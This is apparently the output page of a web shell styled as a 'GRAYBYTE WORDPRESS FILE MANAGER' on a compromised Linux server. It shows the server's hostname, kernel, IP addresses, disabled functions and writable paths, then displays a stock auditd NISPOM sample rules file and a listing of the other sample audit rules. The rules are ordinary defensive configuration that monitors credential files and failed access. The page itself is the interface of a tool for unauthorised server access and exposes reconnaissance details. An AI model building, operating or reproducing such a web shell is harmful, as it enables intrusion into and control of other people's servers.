✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server.blackpussy.asia ​🇻​♯➤ 5.14.0-611.20.1.el9_7.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 163.245.207.76 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗞 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ mail,mb_send_mail
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/share/audit/sample-rules//30-nispom.rules
## This file contains a sample audit configuration intended to
## meet the NISPOM Chapter 8 rules. This rule depends on having
## 10-base-config.rules & 99-finalize.rules installed.

## Audit 1, 1(a) Enough information to determine the date and time of
## action (e.g., common network time), the system locale of the action,
## the system entity that initiated or completed the action, the resources
## involved, and the action involved.

## Things that could affect time
-a always,exit -F arch=b32 -S adjtimex,settimeofday,stime -F key=time-change
-a always,exit -F arch=b64 -S adjtimex,settimeofday -F key=time-change
-a always,exit -F arch=b32 -S clock_settime -F a0=0x0 -F key=time-change
-a always,exit -F arch=b64 -S clock_settime -F a0=0x0 -F key=time-change
# Introduced in 2.6.39, commented out because it can make false positives
#-a always,exit -F arch=b32 -S clock_adjtime -F key=time-change
#-a always,exit -F arch=b64 -S clock_adjtime -F key=time-change
-w /etc/localtime -p wa -k time-change

## Things that could affect system locale
-a always,exit -F arch=b32 -S sethostname,setdomainname -F key=system-locale
-a always,exit -F arch=b64 -S sethostname,setdomainname -F key=system-locale
-w /etc/issue -p wa -k system-locale
-w /etc/issue.net -p wa -k system-locale
-w /etc/hosts -p wa -k system-locale
-w /etc/hostname -p wa -k system-locale
-w /etc/sysconfig/network -p wa -k system-locale
-a always,exit -F dir=/etc/NetworkManager/ -F perm=wa -F key=system-locale

## Audit 1, 1(b) Successful and unsuccessful logons and logoffs.
## This is covered by patches to login, gdm, and openssh
## Might also want to watch these files if needing extra information
#-w /var/log/tallylog -p wa -k logins
#-w /var/run/faillock/ -p wa -k logins
#-w /var/log/lastlog -p wa -k logins
#-w /var/log/btmp -p wa -k logins
#-w /var/run/utmp -p wa -k logins

## Audit 1, 1(c) Successful and unsuccessful accesses to
## security-relevant objects and directories, including
## creation, open, close, modification, and deletion.

## unsuccessful creation
-a always,exit -F arch=b32 -S creat,link,mknod,mkdir,symlink,mknodat,linkat,symlinkat -F exit=-EACCES -F key=creation
-a always,exit -F arch=b64 -S mkdir,creat,link,symlink,mknod,mknodat,linkat,symlinkat -F exit=-EACCES -F key=creation
-a always,exit -F arch=b32 -S link,mkdir,symlink,mkdirat -F exit=-EPERM -F key=creation
-a always,exit -F arch=b64 -S mkdir,link,symlink,mkdirat -F exit=-EPERM -F key=creation

## unsuccessful open
-a always,exit -F arch=b32 -S open,openat,openat2,open_by_handle_at -F exit=-EACCES -F key=open
-a always,exit -F arch=b64 -S open,openat,openat2,open_by_handle_at -F exit=-EACCES -F key=open
-a always,exit -F arch=b32 -S open,openat,openat2,open_by_handle_at -F exit=-EPERM -F key=open
-a always,exit -F arch=b64 -S open,openat,openat2,open_by_handle_at -F exit=-EPERM -F key=open

## unsuccessful close
-a always,exit -F arch=b32 -S close -F exit=-EIO -F key=close
-a always,exit -F arch=b64 -S close -F exit=-EIO -F key=close

## unsuccessful modifications
-a always,exit -F arch=b32 -S rename -S renameat -S truncate -S chmod -S setxattr -S lsetxattr -S removexattr -S lremovexattr -F exit=-EACCES -F key=mods
-a always,exit -F arch=b64 -S rename -S renameat -S truncate -S chmod -S setxattr -S lsetxattr -S removexattr -S lremovexattr -F exit=-EACCES -F key=mods
-a always,exit -F arch=b32 -S rename -S renameat -S truncate -S chmod -S setxattr -S lsetxattr -S removexattr -S lremovexattr -F exit=-EPERM -F key=mods
-a always,exit -F arch=b64 -S rename -S renameat -S truncate -S chmod -S setxattr -S lsetxattr -S removexattr -S lremovexattr -F exit=-EPERM -F key=mods

## unsuccessful deletion
-a always,exit -F arch=b32 -S unlink,rmdir,unlinkat -F exit=-EACCES -F key=delete
-a always,exit -F arch=b64 -S rmdir,unlink,unlinkat -F exit=-EACCES -F key=delete
-a always,exit -F arch=b32 -S unlink,rmdir,unlinkat -F exit=-EPERM -F key=delete
-a always,exit -F arch=b64 -S rmdir,unlink,unlinkat -F exit=-EPERM -F key=delete

## Audit 1, 1(d) Changes in user authenticators.
## Covered by patches to libpam, passwd, and shadow-utils
## Might also want to watch these files for changes
-w /etc/group -p wa -k auth
-w /etc/passwd -p wa -k auth
-w /etc/gshadow -p wa -k auth
-w /etc/shadow -p wa -k auth
-w /etc/security/opasswd -p wa -k auth

## Audit 1, 1(e) The blocking or blacklisting of a user ID,
## terminal, or access port and the reason for the action.
## Covered by patches to pam_tally2 or pam_faillock and pam_limits

## Audit 1, 1(f) Denial of access resulting from an excessive
## number of unsuccessful logon attempts.
## Covered by patches to pam_tally2 or pam_faillock

## Audit 1, 2 Audit Trail Protection. The contents of audit trails
## shall be protected against unauthorized access, modification,
## or deletion.
## This should be covered by file permissions, but we can watch it
## to see any activity
-w /var/log/audit/ -k audit-logs


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
4 Apr 2026 8.12 PM
root / root
0755
10-base-config.rules
0.238 KB
4 Apr 2026 8.12 PM
root / root
0644
10-no-audit.rules
0.277 KB
4 Apr 2026 8.12 PM
root / root
0644
11-loginuid.rules
0.091 KB
4 Apr 2026 8.12 PM
root / root
0644
12-cont-fail.rules
0.325 KB
4 Apr 2026 8.12 PM
root / root
0644
12-ignore-error.rules
0.319 KB
4 Apr 2026 8.12 PM
root / root
0644
20-dont-audit.rules
0.504 KB
4 Apr 2026 8.12 PM
root / root
0644
21-no32bit.rules
0.267 KB
4 Apr 2026 8.12 PM
root / root
0644
22-ignore-chrony.rules
0.248 KB
4 Apr 2026 8.12 PM
root / root
0644
23-ignore-filesystems.rules
0.495 KB
4 Apr 2026 8.12 PM
root / root
0644
30-nispom.rules
4.827 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-1-create-failed.rules
1.465 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-1-create-success.rules
0.729 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-2-modify-failed.rules
1.607 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-2-modify-success.rules
0.807 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-3-access-failed.rules
0.61 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-3-access-success.rules
0.39 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-4-delete-failed.rules
0.549 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-4-delete-success.rules
0.277 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-5-perm-change-failed.rules
0.797 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-5-perm-change-success.rules
0.404 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-6-owner-change-failed.rules
0.565 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42-6-owner-change-success.rules
0.288 KB
4 Apr 2026 8.12 PM
root / root
0644
30-ospp-v42.rules
9.099 KB
4 Apr 2026 8.12 PM
root / root
0644
30-pci-dss-v31.rules
8.184 KB
4 Apr 2026 8.12 PM
root / root
0644
30-stig.rules
9.251 KB
4 Apr 2026 8.12 PM
root / root
0644
31-privileged.rules
1.562 KB
4 Apr 2026 8.12 PM
root / root
0644
32-power-abuse.rules
0.208 KB
4 Apr 2026 8.12 PM
root / root
0644
40-local.rules
0.176 KB
4 Apr 2026 8.12 PM
root / root
0644
41-containers.rules
0.429 KB
4 Apr 2026 8.12 PM
root / root
0644
42-injection.rules
0.656 KB
4 Apr 2026 8.12 PM
root / root
0644
43-module-load.rules
0.389 KB
4 Apr 2026 8.12 PM
root / root
0644
44-installers.rules
1.234 KB
4 Apr 2026 8.12 PM
root / root
0644
70-einval.rules
0.318 KB
4 Apr 2026 8.12 PM
root / root
0644
71-networking.rules
0.147 KB
4 Apr 2026 8.12 PM
root / root
0644
99-finalize.rules
0.084 KB
4 Apr 2026 8.12 PM
root / root
0644
README-rules
1.388 KB
4 Apr 2026 8.12 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF